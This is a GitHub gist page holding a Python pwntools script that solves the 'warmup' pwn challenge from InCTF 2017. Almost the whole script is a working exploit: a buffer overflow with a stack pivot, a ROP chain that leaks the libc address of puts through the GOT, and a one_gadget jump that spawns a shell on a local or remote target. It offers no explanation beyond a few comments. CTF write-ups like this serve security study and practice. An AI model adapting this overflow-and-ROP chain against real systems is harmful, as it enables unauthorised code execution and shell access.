Skip to content

Instantly share code, notes, and snippets.

@berdoezt

berdoezt/warmup.py

Created December 18, 2017 13:20
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save berdoezt/f9306a4529d2c90bad52d894bbffc787 to your computer and use it in GitHub Desktop.
Save berdoezt/f9306a4529d2c90bad52d894bbffc787 to your computer and use it in GitHub Desktop.
Download ZIP
solution for warmup on pwn category inctf 2017
Raw
warmup.py
#!/usr/bin/env python
from pwn import *
import sys
LOCAL = 1
libc = ELF('./libc.so.6')
if LOCAL:
a = process('./warmup', env={"LD_PRELOAD":"./libc.so.6"})
if len(sys.argv) == 2:
gdb.attach(a, 'b *0x0000000000400690')
else:
a = remote("35.196.102.230", 4444)
new_rbp = 0x601100
p = 'a'*0x70
p += p64(new_rbp + 0x70)
p += p64(0x0000000000400675)
a.send(p)
# ================================================================
# 0x45216 execve("/bin/sh", rsp+0x30, environ)
# constraints:
# rax == NULL
# 0x4526a execve("/bin/sh", rsp+0x30, environ)
# constraints:
# [rsp+0x30] == NULL
# 0xf0274 execve("/bin/sh", rsp+0x50, environ)
# constraints:
# [rsp+0x50] == NULL
# 0xf1117 execve("/bin/sh", rsp+0x70, environ)
# constraints:
# [rsp+0x70] == NULL
poprdi = 0x0000000000400703 # : pop rdi ; ret
poprsir15 = 0x0000000000400701 # : pop rsi ; pop r15 ; ret
p = p64(poprdi)
p += p64(0x0000000000601018) # got puts
p += p64(0x00000000004004E0) # plt puts
p += p64(poprsir15)
p += p64(new_rbp + 9 * 8)
p += p64(0)
p += p64(poprdi)
p += p64(0)
p += p64(0x0000000000400500) # plt read
p += 'a'*(0x70 - len(p))
p += p64(new_rbp - 8)
p += p64(0x0000000000400695) # leave; ret
a.send(p)
libc_puts = u64(a.recvuntil('\x7f').split('\n')[1] + '\x00'*2)
base = libc_puts - libc.symbols['puts']
sh_one_gadget = base + 0x4526a
p = p64(sh_one_gadget)
a.send(p)
a.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment